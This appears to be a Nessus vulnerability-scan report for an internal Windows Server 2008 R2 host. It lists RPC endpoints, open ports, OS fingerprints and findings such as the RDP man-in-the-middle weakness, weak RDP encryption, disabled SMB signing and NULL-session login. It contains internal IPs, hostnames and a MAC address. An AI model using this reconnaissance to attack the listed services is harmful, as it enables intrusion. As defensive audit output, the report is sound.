: 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLEA2596E1D0415477D85D5A5442347 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +An SMB server is running on this port. + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +A CIFS server is running on this port. + + + + +Mon Jul 1 11:45:06 2013 +1 +general-purpose +Microsoft Windows Server 2008 R2 Standard Service Pack 1 +00:50:56:81:01:dc +10.31.112.23 +172.16.138.2 +10.31.112.23 +qa3app03 +QA3APP03 +Mon Jul 1 11:33:11 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306260615 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.174 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : disabled +Web application tests : disabled +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/7/1 11:33 +Scan duration : 711 sec + + + +One of several ports that were previously open are now closed or unresponsive. + +There are several possible reasons for this : + + - The scan may have caused a service to freeze or stop running. + + - An administrator may have stopped a particular service during the scanning process. + +This might be an availability problem related to the following : + + - A network outage has been experienced during the scan, and the remote network cannot be reached anymore by the scanner. + + - This scanner may has been blacklisted by the system administrator or by an automatic intrusion detection / prevention system that detected the scan. + + - The remote host is now down, either because a user turned it off during the scan or because a select denial of service was effective. + +In any case, the audit of the remote host might be incomplete and may need to be done again +check_ports.nasl +2013/05/14 +Open Port Re-check +2002/03/19 +remote +None +$Revision: 1.41 $ +- Increase checks_read_timeout and/or reduce max_checks + +- Disable any IPS during the Nessus scan +Previously open ports are now closed. +Port 135 was detected as being open but is now unresponsive +Port 3389 was detected as being open but is now unresponsive +Port 80 was detected as being open but is now unresponsive + + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : general-purpose +Confidence level : 99 + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2008:r2:sp1 -> Microsoft Windows Server 2008 R2 Service Pack 1 + +Following application CPE matched on the remote system : + + cpe:/a:microsoft:iis:7.5 -> Microsoft Internet Information Services (IIS) 7.5 + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : Microsoft Windows Server 2008 R2 Standard Service Pack 1 +Confidence Level : 99 +Method : MSRPC + + +The remote host is running Microsoft Windows Server 2008 R2 Standard Service Pack 1 + + +Each ethernet MAC address starts with a 24-bit 'Organizationally Unique Identifier'. +These OUI are registered by IEEE. +ethernet_manufacturer.nasl +2011/03/27 +Ethernet Card Manufacturer Detection +2009/02/19 +combined +None +$Revision: 1.9 $ +http://standards.ieee.org/faqs/OUI.html +http://standards.ieee.org/regauth/oui/index.shtml +n/a +The manufacturer can be deduced from the Ethernet OUI. + +The following card manufacturers were identified : + +00:50:56:81:01:dc : VMware, Inc. + + + +According to the MAC address of its network adapter, the remote host is a VMware virtual machine. + +Since it is physically accessible through the network, ensure that its configuration matches your organization's security policy. +vmware_detect.nasl +2011/03/27 +VMware Virtual Machine Detection +2005/10/27 +combined +None +$Revision: 1.24 $ +n/a +The remote host seems to be a VMware virtual machine. + + +13818 +CVE-2005-1794 +5.1 +4.6 +CVSS2#E:F/RL:W/RC:ND +CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P +The remote version of the Remote Desktop Protocol Server (Terminal Service) is vulnerable to a man-in-the-middle (MiTM) attack. The RDP client makes no effort to validate the identity of the server when setting up encryption. An attacker with the ability to intercept traffic from the RDP server can establish encryption with the client and server without being detected. A MiTM attack of this nature would allow the attacker to obtain any sensitive information transmitted, including authentication credentials. + +This flaw exists because the RDP server stores a hardcoded RSA private key in the mstlsapi.dll library. Any local user with access to this file (on any Windows system) can retrieve the key and use it for this attack. +true +Exploits are available +tssvc_mim.nasl +17131 +2012/03/30 +Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness +2005/06/01 +remote +Medium +$Revision: 1.23 $ +http://www.oxid.it/downloads/rdp-gbu.pdf +http://www.nessus.org/u?e2628096 +http://technet.microsoft.com/en-us/library/cc782610.aspx +- Force the use of SSL as a transport layer for this service if supported, or/and +- Select the 'Allow connections only from computers running Remote Desktop with Network Level Authentication' setting if it is available. +It may be possible to get access to the remote host. +2005/05/28 +OSVDB:17131 + + +cpe:/o:microsoft:windows +This script attempts to connect to the remote host via RDP (Remote Desktop Protocol) and attempts to take a screenshot of the login screen. + +While this is not a vulnerability by itself, some versions of Windows display the names of the users who can connect and which ones are connected already. +rdp_logon_screen.nbin +2013/05/08 +RDP Screenshot +2013/04/22 +remote +None +$Revision: 1.4 $ +n/a +It is possible to take a screenshot of the remote login screen. +It was possible to gather the following screenshot of the remote login screen. +293713fa5c0d44310392df3bf9c784a3 + + +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services service is not configured to use strong cryptography. + +Using weak cryptography with this service may allow an attacker to eavesdrop on the communications more easily and obtain screenshots and/or keystrokes. +rdp_weak_crypto.nbin +2013/04/22 +Terminal Services Encryption Level is Medium or Low +2012/01/25 +remote +Medium +$Revision: 1.6 $ +Change RDP encryption level to one of : + + 3. High + + 4. FIPS Compliant +The remote host is using weak cryptography. + +The terminal services encryption level is set to : + +2. Medium + + +2.6 +CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N +The encryption setting used by the remote Terminal Services service is not FIPS-140 compliant. +fips_rdp.nbin +2013/04/22 +Terminal Services Encryption Level is not FIPS-140 Compliant +2008/02/11 +remote +Low +$Revision: 1.9 $ +Change RDP encryption level to : + + 4. FIPS Compliant +The remote host is not FIPS-140 compliant. + +The terminal services encryption level is set to : + +2. Medium (Client Compatible) + + +Terminal Services allows a Windows user to remotely obtain a graphical login (and therefore act as a local user on the remote host). + +If an attacker gains a valid login and password, he may be able to use this service to gain further access on the remote host. An attacker may also use this service to mount a dictionary attack against the remote host to try to log in remotely. + +Note that RDP (the Remote Desktop Protocol) is vulnerable to Man-in-the-middle attacks, making it easy for attackers to steal the credentials of legitimate users by impersonating the Windows server. +windows_terminal_services.nasl +2012/03/30 +Windows Terminal Services Enabled +2002/04/20 +remote +None +$Revision: 1.29 $ +Disable Terminal Services if you do not use it, and do not allow this service to run across the Internet. +The remote Windows host has Terminal Services enabled. + + +This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... + +This test is informational only and does not denote any security problem. +http_info.nasl +2011/05/31 +HyperText Transfer Protocol (HTTP) Information +2007/01/30 +remote +None +$Revision: 1.12 $ +n/a +Some information about the remote HTTP configuration can be extracted. + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : OPTIONS, TRACE, GET, HEAD, POST +Headers : + + Content-Type: text/html + Last-Modified: Tue, 01 May 2012 20:47:11 GMT + Accept-Ranges: bytes + ETag: "ca7a095db27cd1:0" + Server: Microsoft-IIS/7.5 + X-Powered-By: ASP.NET + Date: Mon, 01 Jul 2013 18:37:27 GMT + Content-Length: 689 + + + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-IIS/7.5 + + +By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. + +As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. + +Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities. +web_directory_options.nasl +2013/05/09 +HTTP Methods Allowed (per directory) +2009/12/10 +remote +None +$Revision: 1.7 $ +n/a +This plugin determines which HTTP methods are allowed on various CGI directories. +Based on the response to an OPTIONS request : + + - HTTP methods GET HEAD POST TRACE OPTIONS are allowed on : + + / + + + + +cpe:/o:microsoft:windows +5.0 +CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N +Signing is disabled on the remote SMB server. This can allow man-in-the-middle attacks against the SMB server. +smb_signing_disabled.nasl +2012/03/05 +SMB Signing Disabled +2012/01/19 +remote +Medium +$Revision: 1.7 $ +http://support.microsoft.com/kb/887429 +http://www.nessus.org/u?74b80723 +http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html +Enforce message signing in the host's configuration. On Windows, this is found in the Local Security Policy. On Samba, the setting is called 'server signing'. See the 'see also' links for further details. +Signing is disabled on the remote SMB server. +2012/01/17 + + +The remote web server uses its default welcome page. It probably means that this server is not used at all or is serving content that is meant to be hidden. +www_default_page.nasl +2117 +2011/08/12 +Web Server Unconfigured - Default Install Page Present +2003/03/20 +remote +None +$Revision: 1.37 $ +Disable this service if you do not use it. +The remote web server is not configured or is not properly configured. +1994/01/01 +OSVDB:2117 + +The default welcome page is from IIS. + + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +The name of this machine either does not resolve or resolves to a different IP address. + +This may come from a badly configured reverse DNS or from a host file in use on the Nessus scanning host. + +As a result, URLs in plugin output may not be directly usable in a web browser and some web tests may be incomplete. +bad_rdns.nasl +2011/10/06 +Inconsistent Hostname and IP Address +2010/05/03 +remote +None +1.6 +Fix the reverse DNS or host file. +The remote host's hostname is not consistent with DNS information. +The host name 'qa3app03' does not resolve to an IP address + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +10.31.112.23 resolves as qa3app03. + + + +Makes a traceroute to the remote host. +traceroute.nasl +2013/04/11 +Traceroute Information +1999/11/27 +remote +None +1.62 +n/a +It was possible to obtain traceroute information. +For your information, here is the traceroute from 172.16.138.174 to 10.31.112.23 : +172.16.138.174 +172.16.138.2 +10.31.112.23 + + + +cpe:/o:microsoft:windows +The Nessus scanner testing the remote host has been given SMB credentials to log into the remote host, however these credentials do not have administrative privileges. + +Typically, when Nessus performs a patch audit, it logs into the remote host and reads the version of the DLLs on the remote host to determine if a given patch has been applied or not. This is the method Microsoft recommends to determine if a patch has been applied. + +If your Nessus scanner does not have administrative privileges when doing a scan, then Nessus has to fall back to perform a patch audit through the registry which may lead to false positives (especially when using third-party patch auditing tools) or to false negatives (not all patches can be detected through the registry). +smb_scan_not_admin.nasl +2013/01/07 +Nessus Windows Scan Not Performed with Admin Privileges +2007/03/12 +local +None +$Revision: 1.11 $ +Reconfigure your scanner to use credentials with administrative privileges. +The Nessus scan of this host may be incomplete due to insufficient privileges provided. + +It was not possible to connect to '\\QA3APP03\ADMIN$' with the supplied credentials. + + + +It was not possible to connect to PIPE\winreg on the remote host. + +If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. +smb_registry_fail.nasl +2011/03/27 +Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry +2007/10/04 +local +None +$Revision: 1.10 $ +n/a +Nessus is not able to access the remote Windows Registry. +Could not connect to the registry because: +Could not connect to \winreg + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 3389/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 445/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 80/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 135/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 139/tcp was found to be open + + +The remote host is running Microsoft Windows operating system or Samba, a CIFS/SMB server for Unix. It was possible to log into it using one of the following accounts : + +- NULL session +- Guest account +- Given Credentials +true +true +Exploits are available +smb_login.nasl +Microsoft Windows Authenticated User Code Execution +2013/04/23 +Microsoft Windows SMB Log In Possible +2000/05/09 +remote +None +$Revision: 1.136 $ +http://support.microsoft.com/kb/143474 +http://support.microsoft.com/kb/246261 +n/a +It is possible to log into the remote host. +1999/01/01 +- NULL sessions are enabled on the remote host + + + +It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. +smb_nativelanman.nasl +2013/06/25 +Microsoft Windows SMB NativeLanManager Remote System Information Disclosure +2001/10/17 +remote +None +$Revision: 1.40 $ +n/a +It is possible to obtain information about the remote operating system. +The remote Operating System is : Windows Server 2008 R2 Standard 7601 Service Pack 1 +The remote native lan manager is : Windows Server 2008 R2 Standard 6.1 +The remote SMB Domain Name is : RB + + + +The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. + +Note that this plugin gathers information to be used in other plugins but does not itself generate a report. +netbios_name_get.nasl +2013/01/16 +Windows NetBIOS / SMB Remote Host Information Disclosure +1999/10/12 +remote +None +$Revision: 1.77 $ +n/a +It is possible to obtain the network name of the remote host. +The following 3 NetBIOS names have been gathered : + + QA3APP03 = Computer name + RB = Workgroup / Domain name + QA3APP03 = File Server Service + +The remote host has the following MAC address on its adapter : + + 00:50:56:81:01:dc + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49152 : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49152 +IP : 10.31.112.23 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49153 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.23 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49176 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +TCP Port : 49176 +IP : 10.31.112.23 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49253 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 +Description : Unknown RPC service +Annotation : Remote Fw APIs +Type : Remote RPC service +TCP Port : 49253 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Remote RPC service +TCP Port : 49253 +IP : 10.31.112.23 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49154 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.23 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 